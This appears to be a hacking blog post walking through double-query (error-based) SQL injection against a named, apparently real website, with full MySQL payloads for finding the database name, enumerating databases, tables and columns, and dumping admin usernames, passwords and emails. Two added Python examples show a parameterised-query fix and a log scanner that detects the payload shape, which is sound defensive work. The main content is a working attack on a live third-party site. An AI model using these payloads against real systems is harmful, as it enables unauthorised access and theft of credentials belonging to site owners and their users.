Hello friends, today we are gonna look at double query based SQL injection.
this post is by Divakar K
- here is the URL
http://www.advance-acoustic.com/en/produits/index/detail/id/3/sec/1
- now find the injection point
- here is how I got the injection point
- now the next step is to check whether we can extract the database using a union based command or not... but I don't get the details using the union based injection
- now we can learn about double query based SQL injection
step 1: to find the current database name
COMMAND:
http://site.com/index.php?id=5+and(select 1 FROM(select count(*),concat((select (select concat(database())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
- http://www.advance-acoustic.com/en/produits/index/detail/id/3+and%28select%201%20FROM%28select%20count%28*%29,concat%28%28select%20%28select%20concat%28database%28%29%29%29%20FROM%20information_schema.tables%20LIMIT%200,1%29,floor%28rand%280%29*2%29%29x%20FROM%20information_schema.tables%20GROUP%20BY%20x%29a%29/sec/1
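The reason the step 1 probe works at all is the same as for every other form of SQL injection: the `id` value from the URL is spliced straight into the query text, so the `and(select ...)` tail runs as SQL. As an added example (not part of the original post, and using Python with an in-memory SQLite table as a stand-in for the PHP/MySQL application the post targets), the following shows the vulnerable concatenation next to the hardened lookup that validates the type and binds the value as a parameter. The `products` table, the `build_demo_db` helper and the row contents are constructed for the demo.

```python
import sqlite3

# Constructed demo schema (not the site in the post): one product table with
# an integer primary key, looked up by the "id" request parameter.
def build_demo_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products(id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?)",
                     [(3, "amplifier"), (5, "speaker")])
    return conn


def lookup_unsafe(conn, raw_id):
    """Vulnerable pattern: the raw request value is spliced into the SQL text,
    so whatever follows the number is executed as SQL."""
    sql = "SELECT name FROM products WHERE id=" + raw_id
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, raw_id):
    """Hardened pattern: validate the type first, then bind the value as a
    parameter. Returns None when the input is not a plain integer, which is
    the point at which the application should log and reject the request."""
    if not raw_id.isdigit():
        return None
    sql = "SELECT name FROM products WHERE id=?"
    return [row[0] for row in conn.execute(sql, (int(raw_id),))]


# The double-query probe from step 1, as the application would receive it
# after URL decoding (the "+" has become a space).
STEP1_PROBE = ("3 and(select 1 FROM(select count(*),concat((select (select "
               "concat(database())) FROM information_schema.tables LIMIT 0,1),"
               "floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)")


def demo():
    """Run both lookups against normal and hostile input; returns a dict of
    results so the behaviour can be checked rather than only printed."""
    conn = build_demo_db()
    return {
        "unsafe_normal": lookup_unsafe(conn, "3"),
        # A textbook tautology shows the concatenated query executing
        # attacker-controlled SQL: every row comes back instead of one.
        "unsafe_tautology": lookup_unsafe(conn, "3 or 1=1"),
        "safe_normal": lookup_safe(conn, "3"),
        "safe_tautology": lookup_safe(conn, "3 or 1=1"),
        "safe_probe": lookup_safe(conn, STEP1_PROBE),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

Parameter binding on its own would already keep the probe out of the SQL text (the whole string is bound as one value and matches no integer id); the `isdigit()` check in front of it additionally gives you a clean rejection you can count and alert on, instead of a silent empty result.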
step 2: to find the user name use user(), and for the version use version()
- you can get the list of database names using this command
+and(select 1 FROM(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT N,1)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
in this command check for "LIMIT N,1"
you have to increment the N value from 0 up to the number of databases on that site
ex: I used limit 0,1
there are only two databases :-p
I can't increment further
this is how you get the list of databases
step 3: now to find the list of tables in the particular database
+and(select 1 FROM(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables WHERE table_schema=<HEX_VALUE_OF_DB_NAME> LIMIT N,1)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
<HEX_VALUE_OF_DB_NAME>---> here our database name is advance
encoded, this is CHAR(97, 100, 118, 97, 110, 99, 101)
like the previous step, you need to increment the N value to get the list of tables in that particular database
limit 1,1 gives the admin table :-p
step 4: now the next step is to find the column names for the admin table
+and(select 1 FROM(select count(*),concat((select (select (select distinct concat(cast(column_name as char)) FROM information_schema.columns WHERE table_schema=<HEX_VALUE_OF_DB_NAME> AND table_name=<HEX_VALUE_OF_TABLE_NAME> LIMIT N,1)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
<HEX_VALUE_OF_DB_NAME>-----> CHAR(97, 100, 118, 97, 110, 99, 101)
<HEX_VALUE_OF_TABLE_NAME>---> CHAR(97, 100, 109, 105, 110)
as in the previous step, you need to increment the N value to get the list of column names
limit 0,1-->username1
limit 1,1-->password1
step 5: the last step is to dump the values :-p
+and+(select 1 FROM(select+count(*),concat((select+concat(0x3a,username,0x3a,password,0x3a,email,0x3a) FROM <TABLE_NAME>+LIMIT+0,1),floor(rand(0)*2))x FROM information_schema.tables+GROUP BY x)b)
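Every payload in steps 1 to 5 has the same skeleton: `count(*)`, a `concat(...)` wrapped around the value being extracted, `floor(rand(0)*2)` as the grouping key, and `GROUP BY x` over `information_schema.tables`. Those pieces rarely appear together in a legitimate `id` parameter, which makes the technique easy to spot in web-server logs even though the payload is URL-encoded. As an added defender-side example (not from the original post), here is a small Python scanner that decodes the request target from access-log lines, scores it against those building blocks, checks that an `id` parameter is purely numeric, and reports a single `double_query_sqli` verdict when the full shape is present. The log lines are constructed for the demo (the `/products/detail/id/3` path is a stand-in, not the site in the post); the third line carries the encoded step 1 probe.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the original post); the
# third line carries the URL-encoded double-query probe shape from step 1,
# the fourth a plain union-based probe for contrast.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /products/detail/id/3/sec/1 HTTP/1.1" 200 5120
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?id=5 HTTP/1.1" 200 4800
203.0.113.5 - - [10/Oct/2023:13:56:02 +0000] "GET /products/detail/id/3+and%28select%201%20FROM%28select%20count%28*%29,concat%28%28select%20%28select%20concat%28database%28%29%29%29%20FROM%20information_schema.tables%20LIMIT%200,1%29,floor%28rand%280%29*2%29%29x%20FROM%20information_schema.tables%20GROUP%20BY%20x%29a%29/sec/1 HTTP/1.1" 500 312
203.0.113.5 - - [10/Oct/2023:13:56:10 +0000] "GET /index.php?id=5+union+select+1,2,3 HTTP/1.1" 200 4800
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')

# Each signature is one building block of the payloads in the post. The
# regexes run over the lower-cased, URL-decoded request target.
SIGNATURES = {
    "rand_key": re.compile(r"floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\)"),
    "group_by": re.compile(r"group\s+by\s+\w+"),
    "count_star": re.compile(r"count\s*\(\s*\*\s*\)"),
    "information_schema": re.compile(r"information_schema\.(?:schemata|tables|columns)"),
    "union_select": re.compile(r"union\s+(?:all\s+)?select"),
}

# An "id" carried either as ?id=... or as a /id/... path segment is only ever
# expected to be an integer; anything else is suspicious on its own.
ID_PARAM_RE = re.compile(r"(?:[?&]id=|/id/)([^&/]*)")


def decode_request(log_line):
    """Return the URL-decoded request target from one access-log line, or None."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    # unquote_plus maps '+' to a space, the same substitution the database
    # layer sees once the web server and PHP have decoded the query.
    return unquote_plus(m.group(1))


def classify(target):
    """Score one decoded request target and name the matched signatures."""
    lowered = target.lower()
    hits = [name for name, rx in SIGNATURES.items() if rx.search(lowered)]
    id_match = ID_PARAM_RE.search(lowered)
    if id_match and not id_match.group(1).isdigit():
        hits.append("non_numeric_id")
    # The duplicate-key (double query) shape needs all three pieces together;
    # report it as one verdict so an analyst sees the technique, not fragments.
    if {"rand_key", "group_by", "count_star"} <= set(hits):
        verdict = "double_query_sqli"
    elif "union_select" in hits:
        verdict = "union_sqli"
    elif hits:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"verdict": verdict, "signatures": sorted(hits)}


def scan_log(text):
    """Return (line_number, verdict, signatures) for every non-clean request."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        target = decode_request(line)
        if target is None:
            continue
        result = classify(target)
        if result["verdict"] != "clean":
            findings.append((lineno, result["verdict"], result["signatures"]))
    return findings


if __name__ == "__main__":
    for lineno, verdict, sigs in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {verdict} ({', '.join(sigs)})")
```

Run against `SAMPLE_LOG` this flags line 3 as `double_query_sqli` and line 4 as `union_sqli`, while the two ordinary product lookups stay clean. The `non_numeric_id` check is the cheapest rule here and catches the enumeration loop in steps 2 to 4 regardless of which `LIMIT N,1` value the request carries, since every one of those requests puts SQL text where an integer belongs.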